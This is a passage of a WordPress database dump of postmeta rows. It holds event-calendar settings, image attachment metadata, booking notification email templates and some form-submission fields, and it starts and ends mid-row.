ventEndDate','2021-04-26 20:00:00'),(136641,264293,'_EventTimezone','America/Denver'),(136612,264293,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1617202404;s:12:\"_EventOrigin\";i:1617202404;s:13:\"_thumbnail_id\";i:1617203385;s:24:\"boldgrid_hide_page_title\";i:1617202404;s:17:\"_EventShowMapLink\";i:1617202404;s:13:\"_EventShowMap\";i:1617202404;s:15:\"_EventStartDate\";i:1617203385;s:13:\"_EventEndDate\";i:1617203385;s:18:\"_EventStartDateUTC\";i:1617203385;s:16:\"_EventEndDateUTC\";i:1617203385;s:14:\"_EventDuration\";i:1617202404;s:20:\"_EventCurrencySymbol\";i:1617202404;s:22:\"_EventCurrencyPosition\";i:1617202404;s:10:\"_EventCost\";i:1617202404;s:9:\"_EventURL\";i:1617202404;s:14:\"_EventTimezone\";i:1617202404;s:18:\"_EventTimezoneAbbr\";i:1617203385;s:27:\"_EventNextPendingRecurrence\";i:1617202404;s:26:\"_RTECregistrationsDisabled\";i:1617202404;s:17:\"_RTECdeadlineType\";i:1617202404;s:19:\"_RTECwhoCanRegister\";i:1617202404;s:23:\"_RTEClimitRegistrations\";i:1617202404;s:21:\"_RTECmaxRegistrations\";i:1617202404;s:16:\"_EventRecurrence\";i:1617202404;s:18:\"_RTECnumRegistered\";i:1617202404;s:13:\"_EventVenueID\";i:1617202404;s:12:\"_dp_original\";i:1617202404;s:10:\"_edit_last\";i:1617202431;s:12:\"post_content\";i:1617204611;s:10:\"post_title\";i:1617203634;s:16:\"tribe_events_cat\";i:1617226211;s:11:\"post_status\";i:1617203385;}'),(136632,264293,'_EventStartDate','2021-04-26 19:00:00'),(136642,264293,'_EventTimezoneAbbr','MDT'),(136613,264293,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1617202404;s:12:\"_EventOrigin\";i:1617202404;s:13:\"_thumbnail_id\";i:1617203385;s:24:\"boldgrid_hide_page_title\";i:1617202404;s:17:\"_EventShowMapLink\";i:1617202404;s:13:\"_EventShowMap\";i:1617202404;s:15:\"_EventStartDate\";i:1617203385;s:13:\"_EventEndDate\";i:1617203385;s:18:\"_EventStartDateUTC\";i:1617203385;s:16:\"_EventEndDateUTC\";i:1617203385;s:14:\"_EventDuration\";i:1617202404;s:20:\"_EventCurrencySymbol\";i:1617202404;s:22:\"_EventCurrencyPosition\";i:1617202404;s:10:\"_EventCost\";i:1617202404;s:9:\"_EventURL\";i:1617202404;s:14:\"_EventTimezone\";i:1617202404;s:18:\"_EventTimezoneAbbr\";i:1617203385;s:27:\"_EventNextPendingRecurrence\";i:1617202404;s:26:\"_RTECregistrationsDisabled\";i:1617202404;s:17:\"_RTECdeadlineType\";i:1617202404;s:19:\"_RTECwhoCanRegister\";i:1617202404;s:23:\"_RTEClimitRegistrations\";i:1617202404;s:21:\"_RTECmaxRegistrations\";i:1617202404;s:16:\"_EventRecurrence\";i:1617202404;s:18:\"_RTECnumRegistered\";i:1617202404;s:13:\"_EventVenueID\";i:1617202404;s:12:\"_dp_original\";i:1617202404;s:10:\"_edit_last\";i:1617202431;s:12:\"post_content\";i:1617204611;s:10:\"post_title\";i:1617203634;s:16:\"tribe_events_cat\";i:1617226211;s:11:\"post_status\";i:1617203385;}'),(136631,264293,'_EventShowMap',''),(136643,264293,'_EventNextPendingRecurrence','2022-02-20 22:30:00'),(136614,264293,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1617202404;s:12:\"_EventOrigin\";i:1617202404;s:13:\"_thumbnail_id\";i:1617203385;s:24:\"boldgrid_hide_page_title\";i:1617202404;s:17:\"_EventShowMapLink\";i:1617202404;s:13:\"_EventShowMap\";i:1617202404;s:15:\"_EventStartDate\";i:1617203385;s:13:\"_EventEndDate\";i:1617203385;s:18:\"_EventStartDateUTC\";i:1617203385;s:16:\"_EventEndDateUTC\";i:1617203385;s:14:\"_EventDuration\";i:1617202404;s:20:\"_EventCurrencySymbol\";i:1617202404;s:22:\"_EventCurrencyPosition\";i:1617202404;s:10:\"_EventCost\";i:1617202404;s:9:\"_EventURL\";i:1617202404;s:14:\"_EventTimezone\";i:1617202404;s:18:\"_EventTimezoneAbbr\";i:1617203385;s:27:\"_EventNextPendingRecurrence\";i:1617202404;s:26:\"_RTECregistrationsDisabled\";i:1617202404;s:17:\"_RTECdeadlineType\";i:1617202404;s:19:\"_RTECwhoCanRegister\";i:1617202404;s:23:\"_RTEClimitRegistrations\";i:1617202404;s:21:\"_RTECmaxRegistrations\";i:1617202404;s:16:\"_EventRecurrence\";i:1617202404;s:18:\"_RTECnumRegistered\";i:1617202404;s:13:\"_EventVenueID\";i:1617202404;s:12:\"_dp_original\";i:1617202404;s:10:\"_edit_last\";i:1617202431;s:12:\"post_content\";i:1617204611;s:10:\"post_title\";i:1617203634;s:16:\"tribe_events_cat\";i:1617226211;s:11:\"post_status\";i:1617203385;}'),(136630,264293,'_EventShowMapLink',''),(136644,264293,'_RTECregistrationsDisabled','1'),(136645,264293,'_RTECdeadlineType','start'),(136615,264293,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1617202404;s:12:\"_EventOrigin\";i:1617202404;s:13:\"_thumbnail_id\";i:1617203385;s:24:\"boldgrid_hide_page_title\";i:1617202404;s:17:\"_EventShowMapLink\";i:1617202404;s:13:\"_EventShowMap\";i:1617202404;s:15:\"_EventStartDate\";i:1617203385;s:13:\"_EventEndDate\";i:1617203385;s:18:\"_EventStartDateUTC\";i:1617203385;s:16:\"_EventEndDateUTC\";i:1617203385;s:14:\"_EventDuration\";i:1617202404;s:20:\"_EventCurrencySymbol\";i:1617202404;s:22:\"_EventCurrencyPosition\";i:1617202404;s:10:\"_EventCost\";i:1617202404;s:9:\"_EventURL\";i:1617202404;s:14:\"_EventTimezone\";i:1617202404;s:18:\"_EventTimezoneAbbr\";i:1617203385;s:27:\"_EventNextPendingRecurrence\";i:1617202404;s:26:\"_RTECregistrationsDisabled\";i:1617202404;s:17:\"_RTECdeadlineType\";i:1617202404;s:19:\"_RTECwhoCanRegister\";i:1617202404;s:23:\"_RTEClimitRegistrations\";i:1617202404;s:21:\"_RTECmaxRegistrations\";i:1617202404;s:16:\"_EventRecurrence\";i:1617202404;s:18:\"_RTECnumRegistered\";i:1617202404;s:13:\"_EventVenueID\";i:1617202404;s:12:\"_dp_original\";i:1617202404;s:10:\"_edit_last\";i:1617202431;s:12:\"post_content\";i:1617204611;s:10:\"post_title\";i:1617203634;s:16:\"tribe_events_cat\";i:1617226211;s:11:\"post_status\";i:1617203385;}'),(136629,264293,'boldgrid_hide_page_title','0'),(136646,264293,'_RTECwhoCanRegister','any'),(136616,264293,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1617202404;s:12:\"_EventOrigin\";i:1617202404;s:13:\"_thumbnail_id\";i:1617203385;s:24:\"boldgrid_hide_page_title\";i:1617202404;s:17:\"_EventShowMapLink\";i:1617202404;s:13:\"_EventShowMap\";i:1617202404;s:15:\"_EventStartDate\";i:1617203385;s:13:\"_EventEndDate\";i:1617203385;s:18:\"_EventStartDateUTC\";i:1617203385;s:16:\"_EventEndDateUTC\";i:1617203385;s:14:\"_EventDuration\";i:1617202404;s:20:\"_EventCurrencySymbol\";i:1617202404;s:22:\"_EventCurrencyPosition\";i:1617202404;s:10:\"_EventCost\";i:1617202404;s:9:\"_EventURL\";i:1617202404;s:14:\"_EventTimezone\";i:1617202404;s:18:\"_EventTimezoneAbbr\";i:1617203385;s:27:\"_EventNextPendingRecurrence\";i:1617202404;s:26:\"_RTECregistrationsDisabled\";i:1617202404;s:17:\"_RTECdeadlineType\";i:1617202404;s:19:\"_RTECwhoCanRegister\";i:1617202404;s:23:\"_RTEClimitRegistrations\";i:1617202404;s:21:\"_RTECmaxRegistrations\";i:1617202404;s:16:\"_EventRecurrence\";i:1617202404;s:18:\"_RTECnumRegistered\";i:1617202404;s:13:\"_EventVenueID\";i:1617202404;s:12:\"_dp_original\";i:1617202404;s:10:\"_edit_last\";i:1617202431;s:12:\"post_content\";i:1617204611;s:10:\"post_title\";i:1617203634;s:16:\"tribe_events_cat\";i:1617226211;s:11:\"post_status\";i:1617203385;}'),(136618,264293,'_EventOrigin','events-calendar'),(136619,264293,'_EventOrigin','events-calendar'),(136620,264293,'_EventOrigin','events-calendar'),(136621,264293,'_EventOrigin','events-calendar'),(136622,264293,'_EventOrigin','events-calendar'),(136623,264293,'_EventOrigin','events-calendar'),(136624,264293,'_EventOrigin','events-calendar'),(136625,264293,'_EventOrigin','events-calendar'),(136626,264293,'_EventOrigin','events-calendar'),(136627,264293,'_EventOrigin','events-calendar'),(136628,264293,'_thumbnail_id','264294'),(136617,264293,'_EventOrigin','events-calendar'),(136647,264293,'_RTEClimitRegistrations','0'),(136648,264293,'_RTECmaxRegistrations','30'),(136649,264293,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(136650,264293,'_RTECnumRegistered','0'),(136651,264293,'_EventVenueID','262435'),(136653,264293,'_dp_original','263641'),(136654,264293,'_edit_lock','1617226258:2'),(136655,264293,'_edit_last','2'),(136656,264294,'_wp_attached_file','2021/03/compass-in-hand.jpg'),(136657,264294,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:552;s:6:\"height\";i:324;s:4:\"file\";s:27:\"2021/03/compass-in-hand.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"compass-in-hand-300x176.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:176;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"compass-in-hand-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:27:\"compass-in-hand-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:27:\"compass-in-hand-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:27:\"compass-in-hand-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:27:\"compass-in-hand-300x324.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:27:\"compass-in-hand-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(142932,265085,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1073;s:6:\"height\";i:672;s:4:\"file\";s:42:\"2021/05/loveland-location-page-sized-2.jpg\";s:5:\"sizes\";a:9:{s:6:\"medium\";a:4:{s:4:\"file\";s:42:\"loveland-location-page-sized-2-300x188.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:188;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:43:\"loveland-location-page-sized-2-1024x641.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:641;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:42:\"loveland-location-page-sized-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:42:\"loveland-location-page-sized-2-768x481.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:481;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:42:\"loveland-location-page-sized-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:42:\"loveland-location-page-sized-2-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:42:\"loveland-location-page-sized-2-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:42:\"loveland-location-page-sized-2-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:42:\"loveland-location-page-sized-2-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(142931,265085,'_wp_attached_file','2021/05/loveland-location-page-sized-2.jpg'),(143250,265105,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(142930,265084,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1073;s:6:\"height\";i:672;s:4:\"file\";s:42:\"2021/05/loveland-location-page-sized-1.jpg\";s:5:\"sizes\";a:9:{s:6:\"medium\";a:4:{s:4:\"file\";s:42:\"loveland-location-page-sized-1-300x188.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:188;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:43:\"loveland-location-page-sized-1-1024x641.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:641;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:42:\"loveland-location-page-sized-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:42:\"loveland-location-page-sized-1-768x481.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:481;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:42:\"loveland-location-page-sized-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:42:\"loveland-location-page-sized-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:42:\"loveland-location-page-sized-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:42:\"loveland-location-page-sized-1-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:42:\"loveland-location-page-sized-1-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(143942,265198,'mec_fields','a:0:{}'),(143943,265198,'mec_event_status','EventScheduled'),(143944,265198,'mec_moved_online_link',''),(143945,265198,'mec_cancelled_reason',''),(143931,265198,'mec_more_info_title',''),(143932,265198,'mec_more_info_target','_self'),(143933,265198,'mec_cost',''),(143934,265198,'mec_currency','a:0:{}'),(143891,265198,'mec_start_time_hour','7'),(143892,265198,'mec_start_time_minutes','0'),(143893,265198,'mec_start_time_ampm','PM'),(143894,265198,'mec_start_day_seconds','68400'),(143895,265198,'mec_end_date','2021-07-07'),(143880,265197,'_field_37','US'),(143881,265197,'_field_39',''),(143882,265197,'_form_id','4'),(143883,265197,'_seq_num','15'),(168201,267087,'mec_cancellation_key','319e7599bb5ff4936acd95c80003fcbf'),(142868,265070,'_seq_num','3'),(142867,265070,'_form_id','48'),(142866,265070,'_field_448','choll.03@comcast.net'),(142865,265070,'_field_447','Tester'),(142864,265070,'_field_446','Testing 3'),(136794,264308,'protect_children',''),(136795,264308,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1617308273;s:12:\"_EventOrigin\";i:1617308273;s:13:\"_thumbnail_id\";i:1617309071;s:24:\"boldgrid_hide_page_title\";i:1617308274;s:17:\"_EventShowMapLink\";i:1617308274;s:13:\"_EventShowMap\";i:1617308274;s:15:\"_EventStartDate\";i:1617309071;s:13:\"_EventEndDate\";i:1617309071;s:18:\"_EventStartDateUTC\";i:1617309071;s:16:\"_EventEndDateUTC\";i:1617309071;s:14:\"_EventDuration\";i:1617308274;s:20:\"_EventCurrencySymbol\";i:1617308274;s:22:\"_EventCurrencyPosition\";i:1617308274;s:10:\"_EventCost\";i:1617308274;s:9:\"_EventURL\";i:1617308274;s:14:\"_EventTimezone\";i:1617308274;s:18:\"_EventTimezoneAbbr\";i:1617309071;s:27:\"_EventNextPendingRecurrence\";i:1617308274;s:26:\"_RTECregistrationsDisabled\";i:1617308274;s:17:\"_RTECdeadlineType\";i:1617308274;s:19:\"_RTECwhoCanRegister\";i:1617308274;s:23:\"_RTEClimitRegistrations\";i:1617308274;s:21:\"_RTECmaxRegistrations\";i:1617308274;s:16:\"_EventRecurrence\";i:1617308274;s:18:\"_RTECnumRegistered\";i:1617308274;s:13:\"_EventVenueID\";i:1617308274;s:12:\"_dp_original\";i:1617308274;s:10:\"_edit_last\";i:1617308345;s:12:\"post_content\";i:1617310428;s:16:\"tribe_events_cat\";i:1617332028;s:11:\"post_status\";i:1617309071;s:10:\"post_title\";i:1617309155;}'),(136796,264308,'_EventOrigin','events-calendar'),(136797,264308,'protect_children',''),(136798,264308,'protect_children',''),(136799,264308,'protect_children',''),(136800,264308,'protect_children',''),(136801,264308,'protect_children',''),(136802,264308,'protect_children',''),(136803,264308,'protect_children',''),(136804,264308,'protect_children',''),(136805,264308,'protect_children',''),(136806,264308,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1617308273;s:12:\"_EventOrigin\";i:1617308273;s:13:\"_thumbnail_id\";i:1617309071;s:24:\"boldgrid_hide_page_title\";i:1617308274;s:17:\"_EventShowMapLink\";i:1617308274;s:13:\"_EventShowMap\";i:1617308274;s:15:\"_EventStartDate\";i:1617309071;s:13:\"_EventEndDate\";i:1617309071;s:18:\"_EventStartDateUTC\";i:1617309071;s:16:\"_EventEndDateUTC\";i:1617309071;s:14:\"_EventDuration\";i:1617308274;s:20:\"_EventCurrencySymbol\";i:1617308274;s:22:\"_EventCurrencyPosition\";i:1617308274;s:10:\"_EventCost\";i:1617308274;s:9:\"_EventURL\";i:1617308274;s:14:\"_EventTimezone\";i:1617308274;s:18:\"_EventTimezoneAbbr\";i:1617309071;s:27:\"_EventNextPendingRecurrence\";i:1617308274;s:26:\"_RTECregistrationsDisabled\";i:1617308274;s:17:\"_RTECdeadlineType\";i:1617308274;s:19:\"_RTECwhoCanRegister\";i:1617308274;s:23:\"_RTEClimitRegistrations\";i:1617308274;s:21:\"_RTECmaxRegistrations\";i:1617308274;s:16:\"_EventRecurrence\";i:1617308274;s:18:\"_RTECnumRegistered\";i:1617308274;s:13:\"_EventVenueID\";i:1617308274;s:12:\"_dp_original\";i:1617308274;s:10:\"_edit_last\";i:1617308345;s:12:\"post_content\";i:1617310428;s:16:\"tribe_events_cat\";i:1617332028;s:11:\"post_status\";i:1617309071;s:10:\"post_title\";i:1617309155;}'),(136838,264308,'_EventCurrencyPosition','prefix'),(136807,264308,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1617308273;s:12:\"_EventOrigin\";i:1617308273;s:13:\"_thumbnail_id\";i:1617309071;s:24:\"boldgrid_hide_page_title\";i:1617308274;s:17:\"_EventShowMapLink\";i:1617308274;s:13:\"_EventShowMap\";i:1617308274;s:15:\"_EventStartDate\";i:1617309071;s:13:\"_EventEndDate\";i:1617309071;s:18:\"_EventStartDateUTC\";i:1617309071;s:16:\"_EventEndDateUTC\";i:1617309071;s:14:\"_EventDuration\";i:1617308274;s:20:\"_EventCurrencySymbol\";i:1617308274;s:22:\"_EventCurrencyPosition\";i:1617308274;s:10:\"_EventCost\";i:1617308274;s:9:\"_EventURL\";i:1617308274;s:14:\"_EventTimezone\";i:1617308274;s:18:\"_EventTimezoneAbbr\";i:1617309071;s:27:\"_EventNextPendingRecurrence\";i:1617308274;s:26:\"_RTECregistrationsDisabled\";i:1617308274;s:17:\"_RTECdeadlineType\";i:1617308274;s:19:\"_RTECwhoCanRegister\";i:1617308274;s:23:\"_RTEClimitRegistrations\";i:1617308274;s:21:\"_RTECmaxRegistrations\";i:1617308274;s:16:\"_EventRecurrence\";i:1617308274;s:18:\"_RTECnumRegistered\";i:1617308274;s:13:\"_EventVenueID\";i:1617308274;s:12:\"_dp_original\";i:1617308274;s:10:\"_edit_last\";i:1617308345;s:12:\"post_content\";i:1617310428;s:16:\"tribe_events_cat\";i:1617332028;s:11:\"post_status\";i:1617309071;s:10:\"post_title\";i:1617309155;}'),(136837,264308,'_EventCurrencySymbol',''),(136808,264308,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1617308273;s:12:\"_EventOrigin\";i:1617308273;s:13:\"_thumbnail_id\";i:1617309071;s:24:\"boldgrid_hide_page_title\";i:1617308274;s:17:\"_EventShowMapLink\";i:1617308274;s:13:\"_EventShowMap\";i:1617308274;s:15:\"_EventStartDate\";i:1617309071;s:13:\"_EventEndDate\";i:1617309071;s:18:\"_EventStartDateUTC\";i:1617309071;s:16:\"_EventEndDateUTC\";i:1617309071;s:14:\"_EventDuration\";i:1617308274;s:20:\"_EventCurrencySymbol\";i:1617308274;s:22:\"_EventCurrencyPosition\";i:1617308274;s:10:\"_EventCost\";i:1617308274;s:9:\"_EventURL\";i:1617308274;s:14:\"_EventTimezone\";i:1617308274;s:18:\"_EventTimezoneAbbr\";i:1617309071;s:27:\"_EventNextPendingRecurrence\";i:1617308274;s:26:\"_RTECregistrationsDisabled\";i:1617308274;s:17:\"_RTECdeadlineType\";i:1617308274;s:19:\"_RTECwhoCanRegister\";i:1617308274;s:23:\"_RTEClimitRegistrations\";i:1617308274;s:21:\"_RTECmaxRegistrations\";i:1617308274;s:16:\"_EventRecurrence\";i:1617308274;s:18:\"_RTECnumRegistered\";i:1617308274;s:13:\"_EventVenueID\";i:1617308274;s:12:\"_dp_original\";i:1617308274;s:10:\"_edit_last\";i:1617308345;s:12:\"post_content\";i:1617310428;s:16:\"tribe_events_cat\";i:1617332028;s:11:\"post_status\";i:1617309071;s:10:\"post_title\";i:1617309155;}'),(136836,264308,'_EventDuration','3600'),(136839,264308,'_EventCost',''),(136809,264308,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1617308273;s:12:\"_EventOrigin\";i:1617308273;s:13:\"_thumbnail_id\";i:1617309071;s:24:\"boldgrid_hide_page_title\";i:1617308274;s:17:\"_EventShowMapLink\";i:1617308274;s:13:\"_EventShowMap\";i:1617308274;s:15:\"_EventStartDate\";i:1617309071;s:13:\"_EventEndDate\";i:1617309071;s:18:\"_EventStartDateUTC\";i:1617309071;s:16:\"_EventEndDateUTC\";i:1617309071;s:14:\"_EventDuration\";i:1617308274;s:20:\"_EventCurrencySymbol\";i:1617308274;s:22:\"_EventCurrencyPosition\";i:1617308274;s:10:\"_EventCost\";i:1617308274;s:9:\"_EventURL\";i:1617308274;s:14:\"_EventTimezone\";i:1617308274;s:18:\"_EventTimezoneAbbr\";i:1617309071;s:27:\"_EventNextPendingRecurrence\";i:1617308274;s:26:\"_RTECregistrationsDisabled\";i:1617308274;s:17:\"_RTECdeadlineType\";i:1617308274;s:19:\"_RTECwhoCanRegister\";i:1617308274;s:23:\"_RTEClimitRegistrations\";i:1617308274;s:21:\"_RTECmaxRegistrations\";i:1617308274;s:16:\"_EventRecurrence\";i:1617308274;s:18:\"_RTECnumRegistered\";i:1617308274;s:13:\"_EventVenueID\";i:1617308274;s:12:\"_dp_original\";i:1617308274;s:10:\"_edit_last\";i:1617308345;s:12:\"post_content\";i:1617310428;s:16:\"tribe_events_cat\";i:1617332028;s:11:\"post_status\";i:1617309071;s:10:\"post_title\";i:1617309155;}'),(136835,264308,'_EventEndDateUTC','2021-04-24 02:00:00'),(136810,264308,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1617308273;s:12:\"_EventOrigin\";i:1617308273;s:13:\"_thumbnail_id\";i:1617309071;s:24:\"boldgrid_hide_page_title\";i:1617308274;s:17:\"_EventShowMapLink\";i:1617308274;s:13:\"_EventShowMap\";i:1617308274;s:15:\"_EventStartDate\";i:1617309071;s:13:\"_EventEndDate\";i:1617309071;s:18:\"_EventStartDateUTC\";i:1617309071;s:16:\"_EventEndDateUTC\";i:1617309071;s:14:\"_EventDuration\";i:1617308274;s:20:\"_EventCurrencySymbol\";i:1617308274;s:22:\"_EventCurrencyPosition\";i:1617308274;s:10:\"_EventCost\";i:1617308274;s:9:\"_EventURL\";i:1617308274;s:14:\"_EventTimezone\";i:1617308274;s:18:\"_EventTimezoneAbbr\";i:1617309071;s:27:\"_EventNextPendingRecurrence\";i:1617308274;s:26:\"_RTECregistrationsDisabled\";i:1617308274;s:17:\"_RTECdeadlineType\";i:1617308274;s:19:\"_RTECwhoCanRegister\";i:1617308274;s:23:\"_RTEClimitRegistrations\";i:1617308274;s:21:\"_RTECmaxRegistrations\";i:1617308274;s:16:\"_EventRecurrence\";i:1617308274;s:18:\"_RTECnumRegistered\";i:1617308274;s:13:\"_EventVenueID\";i:1617308274;s:12:\"_dp_original\";i:1617308274;s:10:\"_edit_last\";i:1617308345;s:12:\"post_content\";i:1617310428;s:16:\"tribe_events_cat\";i:1617332028;s:11:\"post_status\";i:1617309071;s:10:\"post_title\";i:1617309155;}'),(136834,264308,'_EventStartDateUTC','2021-04-24 